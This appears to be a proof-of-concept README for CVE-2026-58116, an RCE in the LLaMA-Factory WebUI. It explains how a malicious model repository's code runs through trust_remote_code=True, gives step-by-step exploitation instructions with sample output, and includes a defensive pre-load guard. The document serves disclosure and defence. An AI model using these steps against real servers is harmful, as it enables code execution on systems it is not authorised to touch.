## https://sploitus.com/exploit?id=5FAFE7AF-9ADD-5A87-8223-328B9E22885E
# CVE-2026-58116: LLaMA-Factory WebUI RCE via `trust_remote_code`
Proof of concept for **CVE-2026-58116** (CVSS 9.8 Critical): remote code execution
in [LLaMA-Factory](https://github.com/hiyouga/LLaMA-Factory) `<= v0.9.5`.
The LLaMA-Factory WebUI hardcodes `trust_remote_code=True` when loading a model
(`src/llamafactory/webui/chatter.py:139` and `runner.py:175,320`). The
attacker-controlled "Model path" field flows unvalidated into
`AutoTokenizer.from_pretrained()` / `AutoModel.from_pretrained()`, so the
Hugging Face `transformers` library downloads and **executes arbitrary Python**
from a malicious model repository.
## ⚠️ Educational Use Only
This PoC is for authorized security testing and education only. The included
payload is intentionally harmless (it prints host recon via `id`). Only run it
against systems you own or are authorized to test. Never deploy a malicious
payload against infrastructure without explicit permission.
## Contents
```
.
├── poc-model/
│   ├── config.json            # declares auto_map → attacker modules
│   ├── configuration_poc.py   # payload: runs os.system("id ...") at config load
│   ├── modeling_poc.py        # minimal stub model class
│   └── __init__.py            # makes it an importable package
└── build_and_verify.py        # assemble + verify the sink in isolation
```
## How the sink works
`transformers` instantiates the config class **before** loading any weights, so
the payload in `PoCConfig.__init__` fires as soon as the config is read; no
weights need to exist. That is exactly the path LLaMA-Factory reaches through
`src/llamafactory/model/loader.py`:
```python
from transformers import AutoTokenizer

def _get_init_kwargs(model_args):
    # trust_remote_code is taken from model_args; the WebUI sets it to True unconditionally
    return {
        "trust_remote_code": model_args.trust_remote_code,  # True (hardcoded)
        # ... other init kwargs elided
    }

def load_tokenizer(model_args):
    init_kwargs = _get_init_kwargs(model_args)
    # The attacker-controlled model path reaches the sink with trust_remote_code=True
    tokenizer = AutoTokenizer.from_pretrained(model_args.model_name_or_path, **init_kwargs)
```
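The sink above has two independent mitigations a defender can apply in front of it: never pass `trust_remote_code=True` for a user-supplied path, and refuse to load a repository that declares custom code at all. The following is an added example (not part of this PoC repo or of LLaMA-Factory) that implements a pre-load guard: it inspects a local model directory for the `auto_map` key and top-level `.py` files that make `transformers` import repo code, and restricts the "Model path" value to an allowlist. The namespaces in `ALLOWED_HUB_NAMESPACES`, the `load_decision` helper and the two sample repos it builds are all constructed for this example.

```python
import json
import re
import tempfile
from pathlib import Path

# config.json keys that cause transformers to import Python from the model repo.
REMOTE_CODE_KEYS = ("auto_map",)

# Hypothetical allowlist: Hub namespaces this deployment may load from.
ALLOWED_HUB_NAMESPACES = {"meta-llama", "Qwen"}
HUB_ID_RE = re.compile(r"^([A-Za-z0-9][\w.-]*)/([\w.-]+)$")

# The hardened counterpart of the WebUI's hardcoded True.
HARDENED_INIT_KWARGS = {"trust_remote_code": False}


def find_remote_code(model_dir):
    """Return findings showing that a local repo ships executable code:
    an `auto_map` in config.json / tokenizer_config.json, or top-level *.py files."""
    model_dir = Path(model_dir)
    findings = []
    for cfg_name in ("config.json", "tokenizer_config.json"):
        cfg_path = model_dir / cfg_name
        if not cfg_path.is_file():
            continue
        try:
            cfg = json.loads(cfg_path.read_text(encoding="utf-8"))
        except json.JSONDecodeError:
            findings.append(f"{cfg_name}: not valid JSON")
            continue
        for key in REMOTE_CODE_KEYS:
            if key in cfg:
                vals = sorted(cfg[key].values()) if isinstance(cfg[key], dict) else cfg[key]
                findings.append(f"{cfg_name}: {key} -> {vals}")
    for py in sorted(model_dir.glob("*.py")):
        findings.append(f"python file: {py.name}")
    return findings


def is_allowed_model_path(model_path, local_root):
    """Accept only Hub ids in an allowlisted namespace, or local dirs under local_root."""
    m = HUB_ID_RE.match(model_path)
    if m:
        return m.group(1) in ALLOWED_HUB_NAMESPACES
    try:
        resolved = Path(model_path).resolve(strict=True)
        root = Path(local_root).resolve(strict=True)
    except FileNotFoundError:
        return False
    return resolved.is_dir() and resolved.is_relative_to(root)


def load_decision(model_path, local_root):
    """Combine both checks; returns (allowed, reason). Whatever the decision,
    the actual load must still use HARDENED_INIT_KWARGS (trust_remote_code=False),
    so a missed case cannot import repo code."""
    if not is_allowed_model_path(model_path, local_root):
        return False, "model path not in allowlist"
    if HUB_ID_RE.match(model_path):
        # Hub repos are not on disk yet; the trust_remote_code=False backstop covers them.
        return True, "allowlisted Hub namespace"
    findings = find_remote_code(model_path)
    if findings:
        return False, "; ".join(findings)
    return True, "local repo contains no custom code"


def build_sample_repos(base):
    """Construct two sample model directories for this example: one that mirrors
    the PoC layout (auto_map + .py files, harmless stubs here) and one weights-only repo."""
    bad = Path(base) / "remote-code-model"
    bad.mkdir(parents=True)
    (bad / "config.json").write_text(json.dumps({
        "model_type": "poc_model",
        "auto_map": {"AutoConfig": "configuration_poc.PoCConfig",
                     "AutoModel": "modeling_poc.PoCModel"},
    }))
    (bad / "configuration_poc.py").write_text("# stub only; no payload in this example\n")
    (bad / "modeling_poc.py").write_text("# stub only\n")
    good = Path(base) / "plain-model"
    good.mkdir()
    (good / "config.json").write_text(json.dumps({"model_type": "llama", "hidden_size": 16}))
    return bad, good


def run_demo():
    """Exercise the guard on the constructed repos and on a few path values."""
    with tempfile.TemporaryDirectory() as base:
        bad, good = build_sample_repos(base)
        return {
            "bad_findings": find_remote_code(bad),
            "good_findings": find_remote_code(good),
            "bad_decision": load_decision(str(bad), base),
            "good_decision": load_decision(str(good), base),
            "hub_allowed": load_decision("meta-llama/Llama-3-8B", base),
            "hub_blocked": load_decision("your-user/llmfcty-poc", base),
            "escape_blocked": load_decision(str(Path(base).parent), base),
        }


if __name__ == "__main__":
    for name, value in run_demo().items():
        print(f"{name}: {value}")
```

The directory inspection is a detection layer, not a substitute for the kwarg: a repo can also reference custom code from `tokenizer_config.json` or nested paths, which is why `load_decision` keeps `trust_remote_code=False` as the backstop for everything it lets through.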
## Quick start
**Verify the sink locally** (no WebUI needed; proves the contract the WebUI
violates):
```bash
pip install transformers torch
python3 build_and_verify.py
```
Expected output (notice the payload banner appears *during* config load):
```
[+] PoC model assembled at .../poc-model
[*] Loading config with trust_remote_code=True (this triggers the PoC)...
============================================================
[CVE-2026-58116 PoC] trust_remote_code payload executed!
time : 2026-07-02T...
host : gpu-host-01
user : hbuser
------------------------------------------------------------
uid=1000(hbuser) gid=1000(hbuser) groups=1000(hbuser)
============================================================
[+] Config loaded: PoCConfig (model_type=poc_model)
```
**End-to-end via a running LLaMA-Factory WebUI:**
1. Upload the PoC model to the Hub:
```bash
huggingface-cli login
python3 build_and_verify.py --upload your-user/llmfcty-poc
```
2. Launch an affected LLaMA-Factory board: `llamafactory-cli webui`
3. Open the Chat tab, set **Model path** to `your-user/llmfcty-poc`, click **Load Model**.
4. The payload executes on the server as the LLaMA-Factory process.
## References
- NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-58116
- VulnCheck advisory: https://www.vulncheck.com/advisories/llama-factory-remote-code-execution-via-webui-model-path
- Original disclosure (h3nrrrych4u): https://gist.github.com/henrrrychau/08d76ec672f42136bbc1449c4f2973f8